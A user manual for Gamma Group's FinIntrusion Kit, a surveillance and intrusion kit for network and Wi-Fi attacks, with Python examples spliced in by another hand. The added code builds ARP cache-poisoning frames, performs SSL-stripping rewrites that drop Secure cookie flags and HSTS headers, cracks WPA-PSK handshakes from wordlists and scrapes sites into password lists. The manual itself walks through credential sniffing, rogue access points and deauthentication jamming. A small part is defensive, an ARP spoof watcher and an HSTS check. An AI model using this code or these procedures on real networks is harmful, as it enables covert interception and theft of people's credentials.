Release Information




Copyright 2011 by Gamma Group International, UK

Date 2011- 09-23

Release information

Version | Date       | Author | Remarks
1.0     | 2011-05-26 | PK     | Initial version
1.1     | 2011-08-12 | PK     | Review for release 2.1
1.2     | 2011-09-23 | PK     | Review for release 2.2

1 OVERVIEW

The FinIntrusion Kit is a multi-purpose IT Intrusion kit built specifically for the operational needs of today's Law Enforcement and Intelligence Agencies. It can be utilized in a wide range of operational scenarios, such as:

- Breaking into and monitoring Wireless and Wired Networks

- Remotely breaking into E-Mail Accounts

- Performing security assessments of Servers and Networks

The full capabilities are shown in several training courses, each focusing on different operational use-cases.

The following topics are covered within this document:

- Equipment
- Installation
- Configuration
- Usage
- Support

2 FININTRUSION KIT – TOOLSET

All the tools within the BackTrack system require advanced knowledge of the basic techniques related to their purpose. Most tools have to be used on the command line, as they do not provide a graphical user interface.

The FinIntrusion Kit toolset is categorized into the following sub-categories:

- Network: Tools for Local Area Network (LAN) Intrusion

  - Network Scanner discovers all systems which are part of the same Local Area Network.
  - Network Scanner tries to identify the Operating System and Hostname of a Target PC.
  - Network Jammer prevents Internet access for selected systems.
  - Network Sniffer redirects traffic in the Local Area Network and logs credentials from a Target PC.
  - MAC Change spoofs the hardware address of a local network adapter.

- Wireless: Tools for Wireless Network and Client Intrusion

  - Wireless Scanner discovers Access Points and connected Wireless Clients of all wireless networks within reach of the adapter (and antenna).
  - Wireless Scanner discovers Wireless Clients which probe for a known wireless network and emulates a "Fake" Access Point for these systems.
  - Hidden ESSID Identifier starts attacks against a specific wireless network to extract its "hidden" ESSID.
  - Wireless Jammer can be started against selected Wireless Clients or an Access Point to re-route target systems over a "Fake" Access Point.
  - WEP Cracking against 40/64-bit or 104/128-bit protected wireless networks.
  - WPA Cracking against WPA-PSK or WPA2-PSK protected wireless networks.

- Password: Password Generation Utilities

  - Password Generator from a specific website. This generator extracts words from a specified website and generates a unique password list.

- Reporting:

  - Export function to save all results to "*.csv" files.
  - Generate an Activity Log with all status and result messages.

3 EQUIPMENT

The kit includes a range of equipment for various local and remote IT Intrusion scenarios. Some usage examples are supplied within the following chapters.

Overview of Equipment

3.1 Notebook

The notebook is the core of the kit. It is loaded with the BackTrack operating system and the FinIntrusion Kit software.

3.2 USB Hard-Disk

The external USB Hard-Disk contains various data to help with certain attacks, for example:

- Rainbow Tables for LM/WPA/MD5 (note that a WPA table is only valid for the SSIDs it was precomputed for, because the SSID is the salt of the WPA-PSK key derivation)
- Default Password List
- Wordlists for various languages and subjects

It can also be utilized as a storage device for gathered information.

3.3 Wireless Equipment

The included Wireless (802.11) and Bluetooth equipment can be used for short- and long-distance attacks against wireless networks/clients and Bluetooth-enabled devices.

Wireless examples:

- Scanning for Wireless Networks and Clients
- Breaking WEP/WPA/WPA2 Encryption
- Emulating an Access Point for client-side attacks
- Monitoring Wireless LAN Traffic

Bluetooth examples:

- Scanning for Bluetooth Devices
- Executing known attacks like Bluesnarf, Bluebug and more

4 OPERATING SYSTEM

4.1 Introduction The FinIntrusion Kit is shipped with a copy of BackTrack 5, an operating system that is based on Linux and includes a complete set of up-to-date IT intrusion and analysis tools.

BackTrack operating system is used by numerous professional IT security companies world-wide.

4.2 Notebook Usage

Turn on the notebook and boot with the default settings. After the BackTrack graphical login (GDM) and the desktop have loaded, the system is ready to use.

The system can be customized using the programs included in the menu.

5 INSTALLATION

5.1 Prerequisites

- BackTrack 5 R1, 32-bit operating system
- GNOME desktop version
- The following packages have to be installed before FinIntrusion Kit can be used:
  - mono-runtime
  - gtk-sharp2
  - dhcp3-server
  - whois

To install the software on the FinIntrusion Kit follow these steps:

1. Insert the CD-ROM and open the folder "FinIntrusion Kit".

2. Click on the file "finintrusionkit_installer_v_XXX.ggi".

3. A shortcut for launching FinIntrusion Kit now appears on the desktop (/root/Desktop/FinIntrusionKit.desktop).

5.2 License

Place the license ".ggpck" file on a USB dongle or CD-ROM:

1. Mount the USB stick or CD/DVD

CD-ROM:

# sudo mount /media/cdrom0

USB stick (the device name /dev/sdb1 is an example; check dmesg for the device the stick actually got):

# sudo mount /dev/sdb1 /mnt/

2. Copy the license file to /tmp

CD-ROM:

# cp /media/cdrom0/CERTS-FinIntrusion-Kit-Customer_ID-Machine_ID-XX.DAYS.ggpck /tmp/

USB stick:

# cp /mnt/CERTS-FinIntrusion-Kit-Customer_ID-Machine_ID-XX.DAYS.ggpck /tmp/

3. Start FinIntrusion Kit and press the button "import License".

4. Choose your *.ggpck file and press the button "import".

5. After the import the license will be checked.

6. If the license is valid, close the dialog.

7. Restart the FinIntrusion Kit application.

5.3 Update Software

The FinIntrusion Kit software is updated regularly to keep up with changes in the IT environment.

FinIntrusion Kit is equipped with the option of downloading such software updates. It can be configured to automatically check for updates at certain intervals or the user can check straight away for an update.

Update checks can be configured to run every time the application starts or at various intervals. If an update is found, a dialog is shown that offers automatic installation of the updated software.

After the installation of an update the user can verify that the new version has been installed by checking the version number in the About box.

6 CONFIGURATION

6.1 Network Configuration

The user can select the proper network adapter by choosing it from the "Interface:" combo box.

For Network Intrusion it is necessary that FinIntrusion Kit is running in the same network (the same broadcast domain, since the attacks below are ARP-based) as the target system.

If the network adapter has no IP address, press the button to obtain a new IP address via DHCP.

In order to proceed with the Network Intrusion, click the corresponding tab button.

6.2 Wireless Configuration

The user can select the proper wireless adapter by choosing it from the "Interface:" combo box. To attack a target system which is connected through a wireless network it is necessary to be in the same wireless network.

To configure a wireless adapter for a specific wireless network we recommend using "Wicd Network Manager".

Start "Wicd", open Preferences and add the wireless interface, e.g. "wlan0".

Press the "Refresh" button and select a wireless network (SSID broadcasting must be enabled on the Access Point for it to appear in the list). Press the "Connect" button to configure all necessary parameters for the selected wireless network.

6.3 Language Options

The application is translated into a number of languages and the user has the option of choosing one.

Click on "Language" in the main menu on the left side.

After choosing a different language the application has to be restarted for the change to take effect.

7 FININTRUSION KIT – NETWORK INTRUSION

7.1 Target Identification

To monitor or jam a target system it is necessary to detect the system inside the (W)LAN. This feature is provided by the "Network Scanner" and can be started with the corresponding button.

All systems inside the network will be listed. By default a /24 network (class C, e.g. 10.0.0.0/24 or 10.0.0.1 – 10.0.0.254) will be scanned. The target must be in the same network as the FinIntrusion Kit.

Workflow:

1. ARP scan: captures the MAC addresses of all connected targets.

2. Try to identify the Operating System with OS fingerprinting techniques.

3. Try to identify the Hostname.

Note: The OS scan can trigger an AV detection/warning on the target and does not work against all target systems.

Jam Target

"Network Jammer" blocks a target from having Internet access.

"Network Jammer" initiates an "ARP Cache Poisoning" attack against the Target PC and overwrites the MAC address of the Default Gateway in the target's ARP cache with an invalid value, so that the target's outbound traffic is delivered to a hardware address nobody owns.
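Both the ARP scan of step 1 above and the Network Jammer's ARP cache poisoning are ordinary ARP frames. The following Python is an added example, not FinIntrusion Kit code: it builds the broadcast "who-has" requests for a /24 and the unsolicited "is-at" reply that overwrites the gateway entry, parses such frames, and adds a small watcher of the kind a defender uses to spot the jammer (pin the gateway's real MAC and alert when a reply claims the gateway IP with another MAC). All MAC and IP addresses are constructed sample values; actually transmitting a frame would need a raw socket and is not part of the example.

```python
"""ARP scan frames and ARP cache poisoning (Network Jammer style), plus a detector.

Added example, not part of FinIntrusion Kit. Frames are built with struct and
never sent; all addresses are constructed sample values.
"""
import ipaddress
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def mac2b(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def ip2b(ip: str) -> bytes:
    return ipaddress.IPv4Address(ip).packed


def build_arp(op: int, sha: str, spa: str, tha: str, tpa: str, dst_mac: str = None) -> bytes:
    """Ethernet II frame carrying one RFC 826 ARP packet (42 bytes)."""
    dst = mac2b(dst_mac or tha)
    eth = dst + mac2b(sha) + struct.pack("!H", ETH_P_ARP)
    # htype=Ethernet(1), ptype=IPv4, hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    return eth + arp + mac2b(sha) + ip2b(spa) + mac2b(tha) + ip2b(tpa)


def parse_arp(frame: bytes) -> dict:
    """Decode the fields the scanner and the watcher care about."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP-over-Ethernet frame")
    fmt_mac = lambda b: ":".join(f"{x:02x}" for x in b)
    return {
        "op": struct.unpack("!H", frame[20:22])[0],
        "sha": fmt_mac(frame[22:28]),
        "spa": str(ipaddress.IPv4Address(frame[28:32])),
        "tha": fmt_mac(frame[32:38]),
        "tpa": str(ipaddress.IPv4Address(frame[38:42])),
    }


def scan_requests(network: str, my_mac: str, my_ip: str) -> list:
    """Step 1 of 7.1: one broadcast 'who-has' per host of the network; every
    'is-at' reply that comes back reveals a live system and its MAC."""
    return [build_arp(ARP_REQUEST, my_mac, my_ip, ZERO_MAC, str(host), dst_mac=BROADCAST)
            for host in ipaddress.ip_network(network).hosts()]


def jam_frame(target_mac: str, target_ip: str, gateway_ip: str,
              bogus_mac: str = "00:00:00:00:00:01") -> bytes:
    """Unsolicited ARP reply sent to the target only: 'gateway_ip is-at bogus_mac'.
    The target's ARP cache now points its default route at a MAC nobody owns,
    so its outbound traffic is dropped. Re-sending it beats the cache timeout."""
    return build_arp(ARP_REPLY, bogus_mac, gateway_ip, target_mac, target_ip)


class ArpWatch:
    """Defender side: pin the gateway's real MAC and alert on any reply that
    claims a pinned IP with a different MAC (or flips a learned mapping)."""

    def __init__(self, pinned: dict):
        self.pinned = {ip: mac.lower() for ip, mac in pinned.items()}
        self.learned = {}
        self.alerts = []

    def observe(self, frame: bytes):
        p = parse_arp(frame)
        if p["op"] != ARP_REPLY:
            return None
        ip, mac = p["spa"], p["sha"]
        expected = self.pinned.get(ip) or self.learned.get(ip)
        if expected and expected != mac:
            alert = f"ARP spoof: {ip} claimed by {mac}, expected {expected}"
            self.alerts.append(alert)
            return alert
        self.learned.setdefault(ip, mac)
        return None


if __name__ == "__main__":
    # Constructed lab: gateway 10.0.0.1 really is de:ad:be:ef:00:01, target is .7
    watch = ArpWatch({"10.0.0.1": "de:ad:be:ef:00:01"})
    legit = build_arp(ARP_REPLY, "de:ad:be:ef:00:01", "10.0.0.1", "00:11:22:33:44:55", "10.0.0.7")
    poison = jam_frame("00:11:22:33:44:55", "10.0.0.7", "10.0.0.1")
    print(len(scan_requests("10.0.0.0/24", "aa:bb:cc:dd:ee:ff", "10.0.0.99")), "scan frames")
    print(watch.observe(legit), "| legit reply")
    print(watch.observe(poison), "| jam reply")
```

The watcher is what tools like arpwatch do; the practical counter-measure on a managed switch is Dynamic ARP Inspection, which drops exactly the kind of reply `jam_frame` produces.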

The "Network Jammer" runs in the background as long as the FinIntrusion Kit is running, or until the button is pressed again.

7.2 Monitor Target

"Network Sniffer" can be used to extract all usernames and passwords of known protocols from the network traffic.

Press the start button to begin parsing the traffic and printing all account data it finds.

FinIntrusion Kit includes three different Monitoring Modes. The default mode is "HTTPS Emulation".

Mode                             | Behaviour                                                                                 | Protocols (examples)
"Non" SSL Mode                   | Capture credentials which were transmitted in CLEARTEXT                                   | SMTP, POP3, IMAP, Telnet, SNMP, HTTP, FTP, ...
"HTTPS Emulation" (DEFAULT MODE) | Capture credentials which were transmitted in CLEARTEXT and try to redirect HTTPS -> HTTP | SMTP, POP3, IMAP, Telnet, SNMP, HTTP & HTTPS (redirect), FTP, ...
SSL Mode                         | Capture credentials which were transmitted in CLEARTEXT and "encrypted" with SSL          | SMTP & SMTPS, POP3 & POP3S, IMAP & IMAPS, Telnet, SNMP, HTTP & HTTPS, FTP, ...

Note: Enabling the "SSL Man-in-the-Middle" option (SSL Mode) will result in all clients seeing a warning that the SSL/TLS certificate of their servers has changed. This includes all SSL sessions (Web, E-Mail, etc.). The same warning appears in "HTTPS Emulation" mode whenever the HTTPS -> HTTP redirect does not work for a site. The redirect can only succeed for sites the client first requests over plain HTTP; a site the browser has already pinned to HTTPS (e.g. via a Strict-Transport-Security header, RFC 6797) will not be downgraded.
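"HTTPS Emulation" is an SSL-stripping downgrade: the kit, placed in the path by ARP poisoning, rewrites the https:// links and redirects the client sees into http:// and speaks TLS to the real server itself. The following Python is an added illustration, not the kit's code, of the rewriting rules and of the HSTS check that explains why the redirect fails for some sites. It works on a constructed response only and would have to sit inside a transparent proxy to be used; the handling of the Secure cookie flag goes beyond what the manual describes and is this example's addition.

```python
"""HTTPS -> HTTP downgrade ("HTTPS Emulation") in miniature, with the HSTS check.

Added example, not FinIntrusion Kit code. Operates on constructed response text;
a real deployment would sit inline as a transparent proxy.
"""
import re

# Only absolute https URLs are rewritten; relative links inherit the (now
# plain http) scheme of the page automatically.
HTTPS_URL = re.compile(r"https://([A-Za-z0-9.\-]+(?::\d+)?)", re.IGNORECASE)


def hsts_policy(response_headers: dict):
    """Return the Strict-Transport-Security value if the real server sends one.
    A browser that already cached it (or has the host preloaded) refuses plain
    http for that host, so the redirect fails for it and it ends up at the TLS
    warning instead; the proxy can only hide the header from first-time visitors."""
    for name, value in response_headers.items():
        if name.lower() == "strict-transport-security":
            return value
    return None


def strip_https(body: str, headers: dict, stripped_hosts: set):
    """Rewrite https:// links and Location headers to http:// and remember the
    hosts, so the proxy knows which upstream connections must still use TLS."""

    def _rewrite(m):
        stripped_hosts.add(m.group(1).lower())
        return "http://" + m.group(1)

    new_headers = {}
    for name, value in headers.items():
        low = name.lower()
        if low == "location":
            value = HTTPS_URL.sub(_rewrite, value)
        elif low == "set-cookie":
            # A 'Secure' cookie would never be sent back over plain http.
            value = re.sub(r";\s*secure\b", "", value, flags=re.IGNORECASE)
        elif low == "strict-transport-security":
            continue  # do not let the victim learn about HSTS through us
        new_headers[name] = value
    return HTTPS_URL.sub(_rewrite, body), new_headers


def upstream_scheme(host: str, stripped_hosts: set) -> str:
    """Scheme the proxy must use towards the real server for a victim request."""
    return "https" if host.lower() in stripped_hosts else "http"


if __name__ == "__main__":
    # Constructed sample: plain-http landing page linking to an https login
    html = ('<a href="https://Login.example.test/signin">Sign in</a>'
            '<form action="https://login.example.test:8443/auth" method="post">')
    hdrs = {"Location": "https://login.example.test/signin",
            "Set-Cookie": "sid=abc; Secure; HttpOnly",
            "Strict-Transport-Security": "max-age=31536000"}
    seen = set()
    print("server sends HSTS:", hsts_policy(hdrs))
    body, out = strip_https(html, hdrs, seen)
    print(body)
    print(out)
    print(seen, upstream_scheme("login.example.test", seen))
```

`hsts_policy` is the check to run before relying on this mode: if it returns a value, repeat visitors of that site will get the certificate warning described in the note rather than a silent downgrade.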

7.2.1 PCAP Recorder

This feature can be used to record all data from a selected target system into a PCAP file.

This file can be analyzed with different network analyzers (e.g. Wireshark) or kept as a piece of evidence.

FinIntrusion Kit supports two different types of PCAP Recorder:

Mode        | Description
"tcpdump"   | Generates a network capture file (= pcap file) with "tcpdump" in the background. A capture filter for the selected IP (= selected row) is used. No traffic analyzer is started. Output file: "/tmp/fik_pcap_recorder_IP-ADDRESS.pcap"
"Wireshark" | Starts Wireshark in the foreground with a capture filter for the selected target IP. The capture file must be saved manually at the end of the session!

Note: The PCAP Recorder can be combined with all three Monitoring Modes.

7.2.2 Open URL in Browser

Select a logged FTP, HTTP or HTTPS credential and a special option will be activated in the submenu ("Open URL in Browser"). This feature is useful to verify whether the credentials are correct.

Note: The URL/hostname can differ from the URL which is typically used for the authentication process (forwarding, load balancer, etc.). For FTP accounts the credentials (= username and password) will be used automatically.

8 FININTRUSION KIT – WIRELESS INTRUSION

For all wireless based attacks, the Alfa USB adapter should be used, as its chipset and drivers provide the best support for the applied Wireless Intrusion techniques (monitor mode and packet injection).

After the Alfa USB adapter is plugged into the notebook via the provided USB cable, it will be recognized automatically. If the interface is not listed, reconnect the adapter and press the refresh button.

8.1 Wireless Network Identification

All Wireless Network Intrusion functions are blocked until a wireless network has been found.

"Wireless Network Intrusion" Submenu

Press the scan button to scan for wireless networks within range of the FinIntrusion Kit system and display them including detailed information.

The following information is displayed for discovered networks:

- SSID: Name of the Access Point / wireless network
- BSSID: MAC address of the Access Point
- Channel: Used frequency / channel
- Encryption: Type of encryption: OPEN/WEP/WPA/WPA2
- Key: Shown after the key has been recovered

Example of "Wireless Network Scan"

Select an Access Point and a list of "Connected Clients" for this AP will be shown below.

8.2 Identify hidden ESSID

FinIntrusion Kit includes a module to identify a hidden ESSID. For this module it is necessary to have at least one connected client for the selected Access Point, because a hidden ESSID only appears in cleartext in the client's probe and (re)association requests.

An ESSID is necessary for WPA cracking (it is the salt of the WPA-PSK key derivation) and to set up a Fake AP for a specific ESSID.

8.3 Jam Wireless Network

To block all clients which are connected to a specific Access Point, or only one selected wireless client, use the "Wireless Jammer" module.

Example of "Wireless Jammer" started.

"Wireless Jammer" sends de-authentication packets to the wireless client(s).

Note: If a specific connected wireless client is selected before the Wireless Jammer is started, only this client will be blocked. If no "Connected Wireless Client" is selected, all wireless clients of the Access Point will be blocked.

The packet counter for the Wireless Jammer (default value = 10 packets) can be modified in "/usr/local/finintrusionkit/conf/FinIntrusionKit.cfg".


8.4 Break Encryption

FinIntrusion Kit includes a module to break WEP and WPA/WPA2 (PSK mode) encryption. For this module it is necessary to have at least one connected wireless client.

In case a wireless network is encrypted using WEP or WPA/WPA2, select the encrypted network and press the crack button.

The software will now try to automatically retrieve the WEP key or the WPA/WPA2 pre-shared key, which can then be used to join the network.

8.4.1 WEP Cracking

Example of a successful "WEP Crack"

This process should not take longer than 10 minutes. In case it cannot recover the key, try to restart the process. As this technique does not work on all types of wireless networks, it may have to be done manually.

Workflow:

1. Identify a WEP encrypted wireless network with at least one connected wireless client.

2. The connected wireless client is disconnected with de-authentication packets.

3. The target system reconnects to the Access Point; these packets are captured in the background.

4. Start a replay attack and replay these fragments.

5. Access Point / wireless clients are triggered to send more packets; more encrypted data packets / IVs are captured.

6. If enough IVs are collected, the WEP crack can succeed.

Depending on the size of the WEP key and whether ASCII or HEX values were used, a different number of packets must be captured:

Key Length           | Encrypted data packets with different IVs
40 / 64 bit, ASCII   | ~ 30,000 packets
40 / 64 bit, HEX     | ~ 40,000 packets
104 / 128 bit, ASCII | ~ 60,000 packets
104 / 128 bit, HEX   | ~ 70,000 packets

8.4.2 WPA/WPA2-PSK

Example of a successful "WPA/WPA2 Crack"

To recover a "WPA/WPA2" PSK (= Pre-Shared Key) it is necessary to capture a 4-way handshake. This handshake is only performed when a wireless client connects to a wireless network. Once it has completed, the handshake is not sent by the wireless client again (until the next disconnect). To trigger this handshake it is necessary to perform an active attack and disconnect a wireless client with some de-authentication packets.

Workflow:

1. Disconnect an established wireless client / Access Point connection (with de-authentication packets).

2. The wireless client tries to reconnect to the Access Point and performs the 4-way handshake.

3. FinIntrusion Kit starts a wordlist attack against the selected Access Point. On BackTrack, password lists exist at the location "/pentest/passwords/wordlists/".
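The wordlist attack in step 3 tests each candidate passphrase by re-deriving the keys from the captured handshake and comparing the resulting MIC with the one in the capture. The following Python is an added example, not FinIntrusion Kit code: it implements the IEEE 802.11i derivation (PBKDF2-HMAC-SHA1 with the SSID as salt for the PMK, PRF-512 for the PTK, and the EAPOL-Key MIC computed with the KCK) using only hashlib and hmac, and "cracks" a handshake that the script itself constructs from a known passphrase so that it runs offline. The MAC addresses, nonces and SSID are constructed values; a real capture would supply the same fields from messages 1 and 2 of the handshake.

```python
"""WPA/WPA2-PSK wordlist attack against a captured 4-way handshake.

Added example, not FinIntrusion Kit code. Implements the IEEE 802.11i key
derivation (PBKDF2 -> PMK, PRF-512 -> PTK, KCK -> EAPOL-Key MIC) with hashlib
and hmac only. The handshake is constructed in-script so the example runs
offline; a real capture would provide the same fields.
"""
import hashlib
import hmac

MIC_OFFSET = 81   # 4-byte 802.1X header + key descriptor fields up to the MIC


def pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    The SSID is the salt, which is why a hidden ESSID must be recovered first."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk(pmk_: bytes, ap: bytes, sta: bytes, anonce: bytes, snonce: bytes) -> bytes:
    data = min(ap, sta) + max(ap, sta) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk_, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed. The key descriptor
    version (low 3 bits of Key Information) selects HMAC-MD5 (1) or HMAC-SHA1 (2)."""
    version = eapol[6] & 0x07
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, version: int = 2) -> bytes:
    """EAPOL-Key message 2 skeleton (no key data), MIC field still zero."""
    key_info = 0x0108 | version   # Key MIC bit, Pairwise bit, descriptor version
    body = (bytes([2]) + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big")
            + (1).to_bytes(8, "big") + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8
            + b"\x00" * 16 + (0).to_bytes(2, "big"))
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body


def crack(wordlist, ssid, ap, sta, anonce, snonce, eapol):
    """Try every candidate; the first whose KCK reproduces the captured MIC wins."""
    captured = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:   # outside the valid passphrase length
            continue
        kck = ptk(pmk(candidate, ssid), ap, sta, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured):
            return candidate
    return None


def make_handshake(passphrase, ssid, ap, sta, anonce, snonce, version=2):
    """Constructed 'capture': what a real client would have sent as message 2."""
    frame = build_msg2(snonce, version)
    kck = ptk(pmk(passphrase, ssid), ap, sta, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


if __name__ == "__main__":
    # Constructed lab values: AP and client MACs, nonces, SSID and passphrase
    ap, sta = bytes.fromhex("00aabbccddee"), bytes.fromhex("0011223344aa")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol = make_handshake("correct horse", "LabNet", ap, sta, anonce, snonce)
    words = ["password", "12345678", "correct horse", "letmein1"]
    print("recovered PSK:", crack(words, "LabNet", ap, sta, anonce, snonce, eapol))
```

The 4096 PBKDF2 rounds per candidate are what makes this attack slow and what makes SSID-specific rainbow tables attractive; the same derivation shows why a table built for one SSID is useless against another.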

WPA Cracking Option Dialog Box

8.5 Wireless Client Identification

All Wireless Client Intrusion functions are blocked until a wireless network has been found.

"Wireless Client Intrusion" Submenu

Press the scan button to scan for wireless clients within range of the FinIntrusion Kit system and display them including detailed information.

The following information is displayed for discovered clients:

- Client MAC: MAC address of the target client's wireless adapter
- Vendor: Translated "Organizationally Unique Identifier" (OUI), which identifies the vendor / manufacturer of the adapter
- BSSID: MAC address of the Access Point (if associated)
- Probed ESSID: Names of previously used wireless networks which the wireless client is searching for

8.6 Fake / Rogue Access Point

For this attack, the software emulates a fake Access Point which wireless clients can find and connect to. This is a very useful attack to get access to the target's network traffic and gain a position from which to attack their system.

Example of "Fake AP" started

Two different modes exist:

- Reply to all broadcasts
- Reply to a specific ESSID

8.6.1 Adapter Selection

If a client connects and cannot access the Internet, no valuable traffic will be created on its side and therefore no essential data can be gathered by monitoring it.

To redirect all traffic from the target wireless stations, the FinIntrusion Kit system needs an Internet connection/uplink.

Using this technique, clients associate normally with the Access Point and use the Internet as they normally do with public hotspots.

Fake AP adapter: can only be a wireless adapter. The "Fake Access Point" will be started on this adapter.

Uplink adapter: any adapter other than the "Fake AP" adapter which has the status "UP". This interface will be used to provide Internet access for all connected wireless clients. Typically a wired network interface should be used.

8.6.2 Reply to and broadcast all seen ESSIDs

In this mode, the software sees all probe requests for wireless LANs sent by nearby systems and replies to all of them, so the probing systems connect to the emulated Access Point. This is very useful, as especially Windows systems always scan for recently used wireless networks (e.g. hotel/hotspot networks).

The ESSID text field is deactivated. Gamma does not recommend this mode: if a target subject was previously connected to e.g. "My Home Network" / "Hotel XYZ" / "Airport XYZ" and is now connected to an Access Point with the same network name, this can be conspicuous (only if the person is no longer in that environment).

8.6.3 Emulate Access Point only for a specific ESSID

This feature emulates a normal Access Point which the target systems see when scanning for wireless networks. The chosen ESSID can trick people into selecting and associating with this network.

8.6.4 "Monitor all" Button

A passive network sniffer is started in the background. Features are:

- Capture all credentials from wireless clients which are connected to your Fake Access Point.
- Traffic from all wireless clients is captured; no single target selection is necessary.
- All cleartext passwords (FTP, IRC, SNMP, etc.) are captured (same as the Non-SSL Mode in the network section).
- A HTTPS -> HTTP emulation is started automatically in the background, as long as it is supported by the target webpage.

Press the stop button to stop the Fake AP and Monitor function.

9 PASSWORD GENERATOR UTILS

The "Website Profiling" module can be used to crawl a website, extract all words and export them as a password list. This specific password list can speed up a brute-force attack against a well-known target (e.g. web based forum, E-Mail account, etc.).

Example of "Wordlist" generated from the webpage "www.finfisher.com":

Workflow:

1. A web crawler is started. This crawler mirrors max. 500 different webpages from a webserver and saves them in the "/tmp" directory.

2. A web parser extracts all words and saves them to a text file: "/tmp/WEBSITE.txt"

3. All words are imported into the GUI and duplicates are removed.
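Steps 2 and 3 are a text-extraction and de-duplication pass over the mirrored pages. The following Python is an added example, not the kit's parser: it turns mirrored HTML into a wordlist, applies the 33-character limit the kit uses, and, going beyond what the manual describes, skips <script>/<style> bodies so that method and variable names do not end up in the list. The sample page is constructed; the crawl (step 1) is not part of the example, and `write_wordlist` is a hypothetical helper for saving the result.

```python
"""Website Profiling steps 2 and 3 offline: turn mirrored HTML into a wordlist.

Added example, not FinIntrusion Kit code. Works on HTML strings (a mirrored
page from /tmp would be read the same way); the sample page is constructed.
Beyond the manual's description, <script>/<style> bodies are skipped so that
method and variable names do not land in the list.
"""
import re
from html.parser import HTMLParser

MAX_WORD_LEN = 33                       # the kit ignores longer words
WORD_RE = re.compile(r"[^\W\d_]{2,}")   # letters only, any script, 2+ chars


class TextExtractor(HTMLParser):
    """Collect visible text, ignoring script/style bodies; entities such as
    &amp; are decoded by HTMLParser itself (convert_charrefs is on by default)."""

    SKIP = {"script", "style"}

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip_depth += 1
        # alt/title attribute text is visible too and often carries names
        for name, value in attrs:
            if name in ("alt", "title") and value and not self._skip_depth:
                self.chunks.append(value)

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def extract_words(html: str) -> list:
    """Words of one page in document order (duplicates kept)."""
    p = TextExtractor()
    p.feed(html)
    p.close()
    return [w for w in WORD_RE.findall(" ".join(p.chunks)) if len(w) <= MAX_WORD_LEN]


def build_wordlist(pages) -> list:
    """Step 3: merge all pages, drop exact duplicates, keep first-seen order."""
    seen, out = set(), []
    for html in pages:
        for w in extract_words(html):
            if w not in seen:
                seen.add(w)
                out.append(w)
    return out


def write_wordlist(words, path):
    """Hypothetical helper: one word per line, UTF-8, ready for a cracker."""
    with open(path, "w", encoding="utf-8") as f:
        f.write("\n".join(words) + "\n")


if __name__ == "__main__":
    # Constructed sample page
    sample = ('<html><head><title>Gamma &amp; Partner</title>'
              '<script>var secretToken = 1; function loadMenu(){}</script></head>'
              '<body><h1>Welcome to FinFisher</h1><p>Training &amp; Support, Support hours.</p>'
              '<img alt="Headquarters Munich"><p>' + "x" * 40 + ' ok</p></body></html>')
    print(build_wordlist([sample]))
```

Case is preserved deliberately: a cracker's rule set (capitalisation, digit suffixes) is the right place to generate variants, and the raw list stays small.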

Note: Words which are longer than 33 characters are ignored.

9.1 Limitations

The "Website Profiling" module has some limitations:

- Only webpages in HTML are supported. Other source code (e.g. ASP, JS) may generate some unusable words (e.g. method or variable names).

- Only webpages without pre-authentication, session cookies etc. can be analyzed.

- No proxy authentication is supported.

- The wordlist must be cleaned up manually (remove nonsense / unlikely words such as method or variable names).

10 FININTRUSION KIT – OTHER OPTIONS

FinIntrusion Kit provides some additional functions, which are available if a dedicated target PC or user credential is selected. Select a row (left mouse button) and press the right mouse button to get a submenu.

Submenu of "Network Scan"

Submenu of "Wireless Scan"

10.1.1 Delete / Delete all

Delete the selected row or all entries in the list.

10.1.2 Data Export

Save all data tab-separated into an external text file. This file can be analyzed e.g. with Excel.

Example of Target List loaded with Excel

11 ACTIVITY LOG

For legal reasons, FinIntrusion Kit records all actions that have been executed, with a time stamp. The action log can be exported into a regular TXT / CSV file.

Example of Wireless Activity Log

12 SUPPORT

All customers have access to an after-sales website that gives the customers the following capabilities:

- Download product information (latest user manuals, specifications, training slides)
- Access change-log and roadmap for products
- Report bugs and submit feature requests
- Inspect frequently asked questions (FAQ)

The after-sales website can be found at

- https://www.gamma-international.de
  - Username:
  - Password:
